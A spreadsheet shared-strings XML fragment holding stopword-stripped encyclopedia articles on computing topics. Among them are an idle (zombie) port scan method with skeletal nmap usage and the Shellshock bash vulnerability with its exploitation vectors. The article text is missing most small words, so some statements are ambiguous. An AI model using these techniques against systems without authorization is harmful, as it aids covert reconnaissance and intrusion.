  <si>
    <t>File virtualization</t>
  </si>
  <si>
    <t>computing, file virtualization field storage virtualization operating computer file level. involves uniting multiple storage devices single logical pool file. vital part file area network (fan) network file management (nfm) concepts. virtualization designs, primary driver behind file virtualization desire shield users administrators complexity underlying storage environment. other goals include simplified management, efficient capacity usage allocation, reduced management costs". network file management (nfm) data storage management-related category. term used interchangeably virtualization file virtualization among data storage industry press, analysts system administrators. basic idea rapid, ongoing growth file data capacity enterprise networks massive management complexity accelerating operating costs. concept creating virtualization layer clients file servers devices). creating abstraction layer, system administrators simplify management multiple storage devices, including non-disruptive movement data servers, preserving client access path (pathname), policies automating placement data according changing needs, ability discover, analyze report server file usage. references external links taneja group category definition: "network file management solves problems" enterprise storage group category definition: "nas virtualization simplifies file management" network file virtualization storage virtualization file virtualization heats internetnews.com</t>
  </si>
  <si>
    <t>Hacking of consumer electronics</t>
  </si>
  <si>
    <t>hacking consumer electronics increasingly common practice users perform order customize modify devices beyond typically possible. this activity long history, dating days early computer, programming, electronics hobbyists. notable case hacking consumer electronics jailbreaking apple devices rooting android phones, although many electronics video game consoles regularly hacked. while methods allow unrestricted modification existing operating system installation, third-party operating systems developed replacement device's default replicant postmarketos cellphones, dd-wrt tomato routers. process consumer electronics hacking usually accomplished modification system software, either operating system firmware, hardware modifications uncommon. legality hacking consumer electronics challenged years, example cracking encryption keys used high-bandwidth digital content protection, detractors threatened basis legal action. however, companies encouraged hardware hacking, google's nexus pixel series smartphones. overview many modern consumer electronics either operating system firmware. when stored mutable storage device, files modified functionality operating system, replace entirely. method multiple methods used order successfully hack target device, gaining shell access, gathering information device hardware software, using obtained information manipulate operating system. shell access getting access shell allows user commands interact operating system. typically, root shell aimed for, grants administrative privileges, user modify operating system files. root access obtained software exploits (i.e. bugs), bootloader console, serial port embedded device, jtag uart interface.in case gaining root privileges android device, process known rooting. unlocking bootloader android devices, bootloader locked security prevent installation operating systems. unlocking required another installed. android devices, fastboot (odin mode samsung devices) allows flashing operating systems onto storage.das u-boot bootloader commonly used embedded devices routers chromebooks. getting information getting information device's hardware software vital exploits identified, subsequently used either gain shell access, port operating system device, etc. manufacturer open source software device manufacturers include open source software products. when software used licensed copyleft license, manufacturer obliged provide source code open source components. instance naomi requested gplv2 licensed source code linux kernel branch smartphone vendor.a good share consumer devices modified linux kernel, forked applying device-specific changes. android example makes linux kernel. countermeasures device manufacturers often include countermeasures hinder hardware hacking, cryptography prevent unauthorized code executed. example, nvidia graphics cards signed firmware prevent tampering hacking. devices smartphones hardware device removal whistleblower edward snowden showed wired correspondent shane smith remove cameras microphones smartphone. modifying default operating systems reasons hacking done unlock features operating system. examples include: windows phone apple (jailbreaking) google android (rooting) palm webos (developer mode) symbian (executing unsigned code) phone (enabling whatsapp installed) installing third-party operating system another reason hacking done allow unsupported operating systems installed. replicant postmarketos firefox (defunct) general purpose computers general purpose computer historically open design. however, apple's apple silicon based hardware based architecture, making difficult install third-party operating system. asahi linux allows linux-based operating system installed m1-based macs. multimedia devices video game systems there many reasons video game consoles hacked. game consoles often restricted disallow unofficial games (see video game console#licensing), hacking undertaken allow unlicensed games including pirated games. another reason allow features added, using console multimedia player. example xbox media player, made allow pictures movies shown xbox. microsoft xbox xbox xbox xbox series nintendo gamecube game advance nintendo nintendo (homebrew) homebrew nintendo switch sony playstation portable playstation playstation playstation vita others tivo player remove regional restrictions, user operation prohibition flag (fast forward disabled advertising clip etc.) macrovision (video copy flashing copying protect analog hole) blu-ray players remove regional restrictions non-smart mobile phone. remove operator lock lock restriction. other devices graphing calculators texas instruments signing controversy video cards routers dd-wrt openwrt oscilloscopes thermographic cameras devices canon digital cameras nikon digital cameras. devices allowing hacking some devices—most commonly open source—are built homebrew purposes, encourage hacking integral part existence. pandora (console) samsung tekno chumby ouya nokia n900 android phone nexus nexus galaxy nexus, currently phones recommended android open source project software development open many wireless routers' firmware upgrade functions limited accepting updates signed device's manufacturer. result, open-source firmware replacements created many devices, openwrt dd-wrt. legality jailbreaking often considered illegal united states recent ruling u.s. copyright office declaring jailbreaking iphone mobile device would longer violate copyright law. however, simultaneously, ongoing prosecution hackers videogame consoles anti-circumvention violations dmca. main complication, many cases, profiting selling jailbroken rooted equipment value-added service. least accused deny charges claim making back-ups legally purchased games.in around 2010, high-bandwidth digital content protection encryption system, encrypts data running cable boxes, blu-ray players, similar devices displays cracked, copy master needed decrypt hdcp protected streams posted internet. intel, created licenses hdcp technology, stated hdcp sufficient keep users circumventing indicated threaten legal action determined users dmca.also around 2010, issue hacking interactive game controller kinect, microsoft initially condemned threatened legal action hacked soon after, reversed position instead stated intentionally left device open, would fact prosecute modified also electronics right repair jailbreaking rooting (android symbian security bypass list open source hardware projects privilege escalation unsigned code references external links hardware hacking, starch press hardware hacking first steps, openwrt wiki</t>
  </si>
  <si>
    <t>Snort (software)</t>
  </si>
  <si>
    <t>snort free open source network intrusion detection system (ids) intrusion prevention system (ips) created 1998 martin roesch, founder former sourcefire. snort developed cisco, purchased sourcefire 2013.in 2009, snort entered infoworld's open source hall fame "greatest [pieces open source software time". uses snort's open-source network-based intrusion detection/prevention system (ids/ips) ability perform real-time traffic analysis packet logging internet protocol (ip) networks. snort performs protocol analysis, content searching matching. program also used detect probes attacks, including, limited operating system fingerprinting attempts, semantic attacks, buffer overflows, server message block probes, stealth port scans.snort configured three main modes: sniffer, packet logger, network intrusion detection. sniffer mode program read network packets display console. packet logger mode packet logger mode, program packets disk. network intrusion detection system mode intrusion detection mode, program monitor network traffic analyze rule defined user. program perform specific action based identified. third-party tools there several third-party tools interfacing snort administration, reporting, performance analysis: snorby gplv3 ruby rails application base sguil (free) also list free open-source software packages sigma suricata (software) yara zeek references external links official website snort blog talos intelligence grabify alternatives logger</t>
  </si>
  <si>
    <t>IT energy management</t>
  </si>
  <si>
    <t>energy management green analysis management energy demand within information technology department organization. energy demand accounts approximately global emissions, approximately level aviation, represents global energy consumption (over aviation's energy consumption). account modern office building's energy cost.at point, main sources manageable energy demand monitors, accounting energy use, followed data centers servers, accounting energy use. 2006, infrastructures consumed estimated billion energy, totaling cost $4.5 billion. significant opportunities exist enterprises optimise energy usage. computers, data centers networks consume world's electricity. electricity goes power terminal equipment (computers, mobiles devices), goes data centers goes network. router consumes large data center consumes nearly mw.data centers consume times energy standard office building. often, less original source energy used information technology equipment within data center. with introduction technologies products, energy management several equipments greatly improved. server data center power management servers data centers account energy demand. hardware becomes smaller less expensive, energy costs constitute larger portion server data center costs.these allow gains made optimisation servers. this typically done diagnostic tests individual servers developing model data center's energy demand using measurements. analysing every server data centre, server power management software identify servers removed. also enables servers virtualized, processes consolidated smaller number servers, servers predictable cyclical power demand fully powered use. active power management features also included remaining servers lowest power state allows instant wake-up demand required. energy efficiency benchmarks, specpower, specifications, like average power, used comparing server efficiency performance watt. power management research study shows left overnight, resulting estimated annual energy waste 28.8 billion kwh, cost $2.8 billion year. user behaviour slightly different europe, approximately left overnight resulting estimated energy loss billion kwh, costing £300 million year. germany, approximately left overnight, estimated billion energy wasted year, costing €919 million there significant market third-party power management software offering features beyond present windows operating system.most products offer active directory integration per-user/per-machine settings advanced offering multiple power plans, scheduled power plans, anti-insomnia features enterprise power usage reporting. energy efficient ethernet energy efficient ethernet (ieee 802.3az) could reduce energy networking equipment. 2005, network-interface controllers united states computers, switches, routers) used estimated terawatt-hours electricity. according researcher lawrence berkeley laboratory, energy efficient ethernet could save estimated $450 million year energy costs u.s. with savings home computers ($200 million), offices ($170 million), remaining million data centers. energy efficient ethernet saves energy allowing network links either power sleep mode slower rate data. also defines lower power signaling higher quality cables. organisations resources energy management there number industry associations policy organisations whose work promoting energy efficiency includes providing resources information energy management. these include: green grid alliance save energy climate savers computing initiative 2degrees (low carbon network) also energy-efficient ethernet performance watt references</t>
  </si>
  <si>
    <t>IT8212</t>
  </si>
  <si>
    <t>it8212, correctly it8212f, low-end parallel controller designed tech. depending implemented bios configuration it8212f functions either raid atapi mode, supporting four devices using dual channels. raid mode supports hard disk drives includes raid raid raid jbod, along "normal" mode essentially acts standard hard disk controller. optical disk drives cd-rom drives supported atapi mode, also supports hard disk drives loss raid functions. raid functions implemented embedded microprocessor, thus so-called "soft raid" controller. devices based ite's it8212f fall distinct forms: add-on cards, components embedded motherboards personal computers. make neither products, instead selling either controller manufacture rights, along reference designs, third parties products. different implementations significant incompatibilities, requiring bios updates and/or converting feature another driver code, causing inconvenience users. controller's bios normally stored dedicated on-board flash memory device, except controller integrated motherboard bios motherboard's bios often combined one. upgrading bios difficult best. some controllers one-time programmable memory chips, cannot altered all. others devices supported ite's bios-flashing utility, though users reported success utility uniflash. bios cannot configured raid atapi functioning once, users prevented manufacturer's decision changing modes. it8212f according ite's preliminary specification v0.3, compliant atapi-6 specification, supporting transfer modes modes 0,1,2,3 modes along udma modes 0,1,2,3,4,5 also supports specification. 2005, it8212 used low-end raid cards, compusa pata raid card. it8212f controller product page</t>
  </si>
  <si>
    <t>IUCV</t>
  </si>
  <si>
    <t>inter user communication vehicle (iucv) data transfer mechanism line operating systems. introduced vm/sp release 1980.it allows establishment point point communication channels, either virtual machines virtual machine hypervisor services. effect, iucv provides form message-based interaction virtual machines anticipated client/server interaction network connected physical machines emerged later distributed systems. iucv implemented (the hypervisor) controls aspects session establishments, message passing flow control. iucv basics initializing iucv before virtual machine iucv service, must first indicate address area within address space able store information regarding pending information status. therefore, declare buffer method must invoked first. iucv path iucv terminology, session points called path. identified path relevant virtual machine owns session end. path always connected channel meaning connectionless paths. establishing path establish path, initiating virtual machine must invoke connect method, specify path target identity, either another virtual machine name name system service start character valid character within virtual machine name. provided target initialized iucv itself, target notified pending incoming path connection either accept method complete path establishment sever method effectively closes pending path. once path established, messages passed path endpoints. iucv messages iucv messages bounded, beginning end. message pending path endpoint, iucv merge messages. messages sent path using send method. point receive message using receive method. original message also requested reply, receiving point reply method send reply. flow control multiple messages made pending path. number messages allowed pending path specified path establishment cannot exceed 65535. attempting send message path reached pending message limit result error. suspend resume data transfer temporarily suspended using quiesce method. while path suspended, message transfers allowed path resume method invoked virtual machine initially suspended path. polling virtual machine poll iucv notifications using test message test completion methods. nothing pending, virtual machine waits information available. explicit path termination when either point issues sever method, path enters severed (closing) state point notified. point, messages allowed path point still retrieve pending messages. when point also issues sever method, path effectively dismantled. implicit path termination path implicitly closed virtual machine logs virtual machine reset virtual machine terminates iucv operations using retrieve buffer methodin either cases, path, behavior identical explicit path termination. using iucv b2f0 instruction iucv methods invoked using 'b2f0'x instruction. this instruction must invoked virtual supervisor state (for example guest supervisor) operation exception program interrupt generated. instruction interpreted iucv request. iparml iparml iucv parameter list. control block describes method invoked well method parameters. upon completion b2f0 instruction, fields altered indicate status b2f0 instruction completion. notifications notifies virtual machine pending message status information making external interrupt code x'4000' pending virtual machine. when interrupt occurs, information regarding pending status made available address location specified declare buffer method. macros macros specific macro (iucv) generates appropriate code including instruction filling iparml details regarding parameters method defaulted checked conflict. macros made handle iucv application requests. iucv macros (cmsiucv) allow multiple applications share iucv facility within virtual machine. authorization access iucv functions controlled statements directory (the list virtual machines specifications). virtual machine permitted accept communications virtual machines iucv allow directory statement, establish communication path virtual machine iucv statement. also possible allow virtual machine issue path connection requests specific virtual machines specifying virtual machine name iucv statement, example: iucv targetvm. default, user always allowed connect itself. iucv statement controls cp-imposed access control iucv connections. addition, virtual machine impose access control rejecting attempt connect. examples iucv system services system services iucv points virtual machines themselves, allow virtual machine perform hypervisor functions asynchronously access specific hypervisor facilities. some examples *msg message system service. allows virtual machine receive iucv specific virtual machine console outputs results message' console i/o. this used subsystems prop (the programmable operator) fullscreen cms. *spl allows accessing spool files asynchronously. rscs (the remote spool communication subsystem) example application uses system service. (the group control system) uses iucv perform maintenance shared memory areas virtual machines. using implicit path termination, recovery virtual machine ensure locks held shared area virtual machine entered group left unexpectedly properly released. tcp/ip tcp/ip tcp/ip stack uses iucv either allow virtual machine perform socket operations allow virtual machine network interface pass whole frames datagrams tcp/ip stack. s/390 z/architecture implementation linux uses facility implement network interface tcp/ip stack. also vmcf virtual machine communication facility channel-to-channel adapter references external links iucv z/vm programming services manual chapter 2.1.3</t>
  </si>
  <si>
    <t>Icy (application)</t>
  </si>
  <si>
    <t>discontinued package manager jailbroken iphone ipod touch, originally created maintained ripdev, allows users browse download mobile apps range sources. most apps available download free, requiring purchase downloading, including software created ripdev, kate. apps downloaded directly iphone ipod touch generally located /applications/ directory, place "apple native" apps located. project closed october 2009, source code released license. installer taken development teams, weamdev infini-dev. history intended alternative cydia source unofficial apps, since development installer.app (created nullriver) discontinued. purpose developing create package manager used method used cydia, therefore making compatible cydia sources, faster lightweight cydia.the project closed october 2009, source code released license. project picked weamdev. latest version beta 2.3, support group called infini dev, also taken project reviving icy. they created version ripdev's source code called version 1.5.1. 1.4.7 added support ipad. development member sammy guichelaar. development halted early 2014. support infini-dev dropped support order support installer package manager legacy devices. references</t>
  </si>
  <si>
    <t>Shinken (software)</t>
  </si>
  <si>
    <t>shinken open source computer system network monitoring software application compatible nagios. watches hosts services, gathers performance data alerts users error conditions occur conditions clear. shinken's architecture aims offer easier load balancing high availability. administrator manages single configuration, system automatically "cuts" parts dispatches worker nodes. takes name functionality: shinken japanese sword. shinken written jean gabès proof concept nagios architecture. believing implementation faster flexible code, proposed development branch nagios this proposal turned nagios authors, shinken became independent network monitoring software application compatible nagios.shinken designed operating systems python runs. development environment linux, also runs well unix variants windows. reactionner process (responsible sending notifications) also android free software, licensed terms affero general public license published free software foundation. overview design monitoring system written python distributed architecture using pyro remote objects active passive monitoring methods monitoring network services (smtp, pop3, http, nntp, icmp, snmp, ftp, ssh) monitoring host resources (processor load, disk usage, system logs) majority network operating systems, including microsoft windows using agents nsclient++, send_nsca, check thrift tsca using agents permitting remotely scripts nagios remote plugin executor embedded pure-python implementation included shinken) using agent-less methods snmp, wmi, scripted http(ssl) send check results directly programs using apache thrift (java, python, ruby) monitoring systems ability send collected data network specifically written plugins (ex. vmware esx3/4/5, collectd) remote monitoring supported encrypted tunnels. simple plugin design allows users easily develop service checks depending needs, using tools choice (shell scripts, c++, perl, ruby, python, php, etc.) ability calculate kpis state performance data shinken core create services performance data system external interfaces livestatus compatible exposes state, configuration performance information exports data graphing modules (pnp4nagios, graphite, others available) support native messaging android export event data logging systems using syslog rabbitmq modules attached shinken process extend capabilities efficient ways performance parallelized service host checks available ability distribute poller processes multiple servers support implementing easily redundant load balanced monitoring hosts support multiple redundant external interfaces ability route checks dedicated pollers (processes specialized executing plugins) correlation business intelligence parent child relations ability define network host hierarchy using "parent" hosts, allowing detection distinction hosts unreachable free form dependency trees service host support integrated business rules calculated hosts services representing state business service support assigning business impact service, host business process ability show root problems automatically changes child states unknown parent unavailable other features contact notifications service host problems occur resolved (via e-mail, pager, sms, user-defined method plugin system) ability define event handlers service host events proactive problem resolution ability redefine severity alert based regular expression rules support utf-8 objects names support monitoring multiple customers administration point support recurring downtimes maintenance_period attribute advanced template system inheritance overloading architecture shinken installation consists several processes, optimized specific task. arbiter loads configuration files dispatches host service objects scheduler(s) watchdog processes responsible initiating failovers error detected route check result events receiver associated scheduler arbiter modules there variety modules manipulate configuration data scheduler plans next host service checks dispatches checks poller(s) calculates state dependencies applies triggers raises notifications dispatches reactionner(s) updates retention file retention backends) sends broks (internal events kind) broker(s) poller gets checks scheduler, execute plugins integrated poller modules send results scheduler poller modules nrpe executes active data acquisition nagios remote plugin executor agents snmp executes active data acquisition snmp enabled agents beta stage using pysnmp) commandpipe receives passive status performance data check_mk script, process commands reactionner gets notifications eventhandlers scheduler, executes plugins/scripts sends results scheduler broker multiple modules (usually running processes) gets broks scheduler forwards broker modules modules decide handle brok depending brok's type (log, initial service/host status, check result, begin/end downtime, ...) modules process broks many different ways. some modules are: webui updates in-memory objects provides webserver native shinken livestatus updates in-memory objects queried using guis like thruk check_mk multisite graphite exports data graphite database ndodb updates database (mysql oracle) simple_log centralize logs shinken processes status_dat writes status.dat file read classic cgi-based receiver (optional) receives data passively local remote protocols passive data reception buffered forwarding appropriate scheduler arbiter global commands) allows "farm" receivers handle high rate incoming events modules receivers nsca nsca protocol receiver collectd receive performance data collectd network commandpipe receive commands, status updates performance data tsca apache thrift interface send check results using high rate buffered connection directly programs service service accepts http posts check results (beta)there multiple instances type process, either single host spread many hosts. adding processes automatically distributes load. shinken webui builtin interface provides near real time status information, configuration, interaction, dashboard visualize trending data graphite databases visualization dependency tree graphs. shinken skonfui independent front-end used manage discovery process configuration tasks. shinken-admin script used manage runtime process level aspects system, changing logging levels getting health reports. install.sh script main management script install, remove update shinken associated software. development shinken open test-driven development approach, contributors project providing features, code refactoring, code quality fixing.the source code hosted github. integration server runs tests commit depth tests regular intervals. shinken documentation hosted wiki. also comparison network monitoring systems nrpe icinga nagios collectd references external links official website monitoring plugins home official plugins german) linux magazin article shinken german linux magazin 04/2010</t>
  </si>
  <si>
    <t>ShieldsUP</t>
  </si>
  <si>
    <t>shieldsup online port scanning service created steve gibson gibson research corporation. purpose utility alert users ports opened firewalls routers, used malicious users take advantage security vulnerabilities. utility scans common file sharing ports, well service ports (1-1056), user defined ports, sets 64.it often recommended checking port vulnerabilities.the scanning servers static addresses 4.79.142.192 4.79.142.207. also dshield references external links official website gibson research corporation</t>
  </si>
  <si>
    <t>Idle scan</t>
  </si>
  <si>
    <t>idle scan port scan method consists sending spoofed packets computer find services available. this accomplished impersonating another computer whose network traffic slow nonexistent (that transmitting receiving information). this could idle computer, called "zombie". overview this action done common software network utilities nmap hping. attack involves sending forged packets specific machine target effort find distinct characteristics another zombie machine. attack sophisticated interaction attacker computer target: attacker interacts "zombie" computer. this exploit functions purposes, port scanner mapper trusted relationships machines. target system interacts "zombie" computer difference behavior observed using different "zombies" evidence different privileges granted target different computers.the overall intention behind idle scan "check port status remaining completely invisible targeted host." origins discovered salvatore sanfilippo (also known handle "antirez") 1998, idle scan used many black "hackers" covertly identify open ports target computer preparation attacking although originally named dumb scan, term idle scan coined 1999, publication proof concept 16-bit identification field (ipid) scanner named idlescan, filipe almeida (aka liquidk). this type scan also referenced zombie scan; nomenclatures nature computers involved attack. tcp/ip basics design operation internet based internet protocol suite, commonly also called tcp/ip. primary protocol internet layer internet protocol suite task delivering datagrams source host destination host solely based addresses. purpose, defines addressing methods structures datagram encapsulation. connectionless protocol relies transmission packets. every packet given source uniquely identifies datagram.tcp provides reliable, ordered delivery stream bytes program computer another program another computer. protocol major internet applications rely world wide web, e-mail, file transfer. each applications (web server, email server, server) called network service. system, network services identified using components: host address port number. there 65536 distinct usable port numbers host. most services limited range numbers default, default port number service almost always used. some port scanners scan common port numbers, ports commonly associated vulnerable services, given host. see: list port numbers. result scan port usually generalized three categories: open accepted: host sent reply indicating service listening port. closed denied listening: host sent reply indicating connections denied port. filtered, dropped blocked: there reply host.open ports present vulnerabilities administrators must wary: security stability concerns associated program responsible delivering service open ports. security stability concerns associated operating system running host open closed ports.filtered ports tend present vulnerabilities. host local network protected firewall filters, according rules administrator packets. this done deny services hosts known prevent intrusion inside network. protocol network layer transmission protocol. basic mechanics idle scans take advantage predictable identification field value header: every packet given source uniquely identifies fragments original datagram; protocol implementation assigns values mandatory field generally fixed value increment. because transmitted packets numbered sequence many packets transmitted packets receive. attacker would first scan host sequential predictable sequence number (ipid). latest versions linux, solaris, openbsd, windows vista suitable zombie, since ipid implemented patches randomized ipid. computers chosen used stage known "zombies".once suitable zombie found next step would establish connection given service (port) target system, impersonating zombie. done sending packet target computer, spoofing address zombie, i.e. source address equal zombie address. port target computer open accept connection service, responding syn/ack packet back zombie. zombie computer send packet target computer reset connection) actually send packet first place. since zombie send packet increment ipid. this attacker would find target's port open. attacker send another packet zombie. ipid incremented step attacker would know particular port closed. method assumes zombie interactions: message sent reasons first interaction attacker zombie second interaction message, false positive. finding zombie host first step executing idle scan find appropriate zombie. needs assign packets incrementally global (rather per-host communicates with) basis. idle (hence scan name), extraneous traffic bump sequence, confusing scan logic. lower latency attacker zombie, zombie target, faster scan proceed. note port open, ipids increment following sequence: attacker target syn, target zombie -&gt;syn/ack, zombie target (ipid increment attacker tries probe zombie result. attacker zombie -&gt;syn/ack, zombie attacker (ipid increment process ipid increments finally. when idle scan attempted, tools (for example nmap) tests proposed zombie reports problems work, another. enough internet hosts vulnerable zombie candidates hard find. common approach simply execute ping sweep network. choosing network near source address, near target, produces better results. idle scan using available host ping sweep results find works. usual, best permission using someone's machines unexpected purposes idle scanning. simple network devices often make great zombies commonly underused (idle) built simple network stacks vulnerable traffic detection. while identifying suitable zombie takes initial work, keep re-using good ones. alternatively, research utilizing unintended public services zombie hosts perform similar idle scans. leveraging services perform outbound connections upon user submissions serve kind poor's idle scanning. using hping hping method idle scanning provides lower level example idle scanning performed. example target host (172.16.0.100) scanned using idle host (172.16.0.105). open closed port tested scenario plays out. first, establish idle host actually idle, send packets using hping2 observe numbers increase incrementally one. numbers increase haphazardly, host actually idle predictable send spoofed packet target host port expect open. case, port (ssh) tested. since spoofed packet, receive reply hping reports 100% packet loss. target host replied directly idle host syn/ack packet. now, check idle host number increased. notice proxy hosts increased id=1379 id=1381. 1380 consumed idle host replied target host's syn/ack packet packet. processes testing port likely closed. here testing port (telnet). notice time, increase port closed. when sent spoofed packet target host, replied idle host packet increase counter. using nmap first thing user would find suitable zombie lan: performing port scan identification option nmap) zombie candidate network rather ping scan helps selecting good zombie. long verbose mode (-v) enabled, detection usually determine sequence generation method print line sequence generation: incremental”. type given incremental broken little-endian incremental, machine good zombie candidate. that still guarantee work, solaris systems create sequence host communicate with. host could also busy. detection open port list also help identifying systems likely idle. another approach identifying zombie candidates ipidseq script host. this script probes host classify generation method, prints classification much like detection does. like scripts, ipidseq.nse many hosts parallel, making another good choice scanning entire networks looking suitable hosts. nmap 192.168.1.0/24 this tells nmap ping sweep show hosts given range. once found zombie, next would send spoofed packets: nmap &lt;port&gt; &lt;zombie &lt;target images juxtaposition show stages successful scenario. effectiveness although many operating systems immune used attack, some popular systems still vulnerable; making idle scan still effective. once successful scan completed trace attacker's address target's firewall intrusion-detection system log. another useful possibility chance by-passing firewall scanning target zombie's computer, might extra rights attacker's. also computer security computer system content vectoring protocol cracking port scanner service scan vulnerability scanner notes external links insecure.org/nmap/idlescan in-depth article idle scanning insecure.org official site nmap hping.org official site hping nmap.online-domain-tools.com online nmap scanner techtarget.com article idle scanning seclists.org original bugtraq post anth blog idle scans using public services</t>
  </si>
  <si>
    <t>Shellshock (software bug)</t>
  </si>
  <si>
    <t>shellshock, also known bashdoor, family security bugs unix bash shell, first disclosed september 2014. shellshock could enable attacker cause bash execute arbitrary commands gain unauthorized access many internet-facing services, servers, bash process requests. september 2014, stéphane chazelas informed bash's maintainer chet ramey discovery original bug, called "bashdoor". working security experts, chazelas developed patch (fix) issue, assigned vulnerability identifier cve-2014-6271. existence announced public 2014-09-24, bash updates ready distribution.the chazelas discovered caused bash unintentionally execute commands commands concatenated function definitions stored values environment variables. within days publication, variety related vulnerabilities discovered (cve-2014-6277, cve-2014-6278, cve-2014-7169, cve-2014-7186 cve-2014-7187). ramey addressed series patches.attackers exploited shellshock within hours initial disclosure creating botnets compromised computers perform distributed denial-of-service attacks vulnerability scanning. security companies recorded millions attacks probes related days following disclosure.because potential compromise millions unpatched systems, shellshock compared heartbleed severity. background shellshock affects bash, program various unix-based systems execute command lines command scripts. often installed system's default command-line interface. analysis source code history bash shows introduced august 1989, released bash version 1.03 september 1989.shellshock arbitrary code execution vulnerability offers users system execute commands unavailable them. this happens bash's "function export" feature, whereby bash process share command scripts bash processes executes. this feature implemented encoding scripts table shared processes, known environment variable list. each bash process scans table encoded scripts, assembles command defines script process, executes command. process assumes scripts found list come another bash process, cannot verify this, verify command built properly formed script definition. therefore, attacker execute arbitrary commands system exploit bugs exist bash's command interpreter, attacker manipulate environment variable list cause bash run. time discovered, bash installed macos many linux operating systems main command interpreter, program used system function program would bash presence announced public 2014-09-24, bash updates ready distribution, though took time computers updated close potential security issue. reports attacks within hour announcement bash vulnerability, reports machines compromised bug. september 2014, botnets based computers compromised exploits based used attackers distributed denial-of-service (ddos) attacks vulnerability scanning. kaspersky labs reported machines compromised attack, dubbed "thanks-rob", conducting ddos attacks three targets, identify. september 2014, shellshock-related botnet dubbed "wopbot" reported, used ddos attack akamai technologies scan united states department defense.on september, security firm incapsula noted 17,400 attacks 1,800 domains, originating unique addresses, previous hours; attacks coming china united states. september, website performance firm cloudflare said tracking approximately million attacks probes related bug.on october, widely reported yahoo! servers compromised attack related shellshock issue. next day, denied shellshock specifically allowed attacks. specific exploitation vectors cgi-based server when server uses common gateway interface (cgi) handle document request, copies certain information request environment variable list delegates request handler program. handler bash script, executes bash, bash receive environment variables passed server process described above. this provides means attacker trigger shellshock vulnerability specially crafted document request. security documentation widely used apache server states: "cgi scripts extremely dangerous carefully checked," methods handling server requests typically used instead. there number online services attempt test vulnerability servers exposed internet. openssh server openssh "forcecommand" feature, fixed command executed user logs instead running unrestricted command shell. fixed command executed even user specified another command run; case original command environment variable "ssh_original_command". when forced command bash shell user's shell bash), bash shell parse ssh_original_command environment variable start-up, commands embedded user used restricted shell access gain unrestricted shell access, using shellshock bug. dhcp clients some dhcp clients also pass commands bash; vulnerable system could attacked connecting open wi-fi network. dhcp client typically requests gets address dhcp server, also provided series additional options. malicious dhcp server could provide, options, string crafted execute code vulnerable workstation laptop. qmail server when using bash process email messages (e.g. .forward qmail-alias piping), qmail mail server passes external input exploit vulnerable version bash. restricted shell exploited gain access bash restricted shell hardware management console, tiny linux variant system administrators. released patch resolve this. reported vulnerabilities overview maintainer bash warned first discovery 2014-09-12; followed soon. companies distributors informed matter publicly disclosed 2014-09-24 identifier cve-2014-6271. however, release patch subsequent reports different, related vulnerabilities.on september 2014, open-source contributors, david wheeler norihiro tanaka, noted additional issues, even patching systems using recently available patches. email addressed oss-sec bash-bug mailing lists, wheeler wrote: "this patch continues 'whack-a-mole' fixing parsing errors began first patch. bash's parser certain [to] many many many vulnerabilities".on september 2014, michał zalewski google inc. announced discovery bash vulnerabilities, based upon fact bash typically compiled without address space layout randomization. october, zalewski released details final bugs confirmed patch florian weimer posted september indeed prevent them. done using fuzzing technique software utility known american fuzzy lop. initial report (cve-2014-6271) this original form vulnerability (cve-2014-6271) involves specially crafted environment variable containing exported function definition, followed arbitrary commands. bash incorrectly executes trailing commands imports function. vulnerability tested following command: systems affected vulnerability, commands display word "vulnerable" result bash executing command "echo vulnerable", embedded specially crafted environment variable named "x". cve-2014-6277 discovered michał zalewski, vulnerability cve-2014-6277, relates parsing function definitions environment variables bash, cause segfault. cve-2014-6278 also discovered michał zalewski, (cve-2014-6278) relates parsing function definitions environment variables bash. cve-2014-7169 original vulnerability published, tavis ormandy discovered related (cve-2014-7169), demonstrated following code: vulnerable system, would execute command "date" unintentionally.here example system patch cve-2014-6271 cve-2014-7169: system displays syntax errors, notifying user cve-2014-6271 prevented, still writes file named 'echo', working directory, containing result 'date' call. system patched cve-2014-6271 cve-2014-7169 simply echo word "date" file "echo" created, shown below: cve-2014-7186 florian weimer todd sabin found (cve-2014-7186), relates out-of-bounds memory access error bash parser code.an example vulnerability, leverages multiple "&lt;&lt;eof" declarations (nested "here documents"): vulnerable system echo text "cve-2014-7186 vulnerable, redir_stack". cve-2014-7187 also found florian weimer, cve-2014-7187 off-by-one error bash parser code, allowing out-of-bounds memory access.an example vulnerability, leverages multiple "done" declarations: vulnerable system echo text "cve-2014-7187 vulnerable, word_lineno". this test requires shell supports brace expansion. patches until september 2014, bash maintainer chet ramey provided patch version bash43-025 bash addressing cve-2014-6271, already packaged distribution maintainers. september, bash43-026 followed, addressing cve-2014-7169. then cve-2014-7186 discovered. florian weimer posted patch code "unofficially" september, ramey incorporated bash bash43-027.—these patches provided code only, helpful know compile ("rebuild") bash binary executable file patch file remaining source code files. patches added variable name prefix functions exported; prevented arbitrary variables triggering vulnerability enabled programs remove bash functions environment. next day, officially presented according updates enterprise linux, another fedora 21.canonical ltd. presented updates ubuntu long term support versions saturday, september; sunday, updates suse linux enterprise. following monday tuesday month, updates appeared.on october 2014, michał zalewski google inc. finally stated weimer's code bash43-027 fixed first three bugs even remaining three published bash43-027, including discoveries. this means earlier distribution updates, updates required cover issues.all also covered hardware management console. references external links nist national vulnerability database archived september 2011 wayback machine common vulnerabilities exposures cve-2014-6271 20140924nist 20140909cve (first bug) cve-2014-6277 20140927nist 20140909cve cve-2014-6278 20140930nist 20140909cve cve-2014-7169 20140924nist 20140924cve (second bug) cve-2014-7186 20140929nist 20140925cve cve-2014-7187 20140929nist 20140925cve bash source code project, includes patches known vulnerabilities september 2014) "shellshock wild", malware droppers, reverse shells backdoors, data exfiltration, ddos fireeye, inc. collection attacks seen wild september 2014) sans institute security alert cve-2014-7169 oracle "vmware remediation bash code injection vulnerability specially crafted environment variables" vmware cyberwatch vulnerabilities database archived august 2018 wayback machine cve-2014-6271 cve-2014-6277 cve-2014-6278 cve-2014-7169 cve-2014-7186 cve-2014-7187 shellshock exploitation metasploit framework</t>
  </si>
  <si>
    <t>Shellcode</t>
  </si>
  <si>
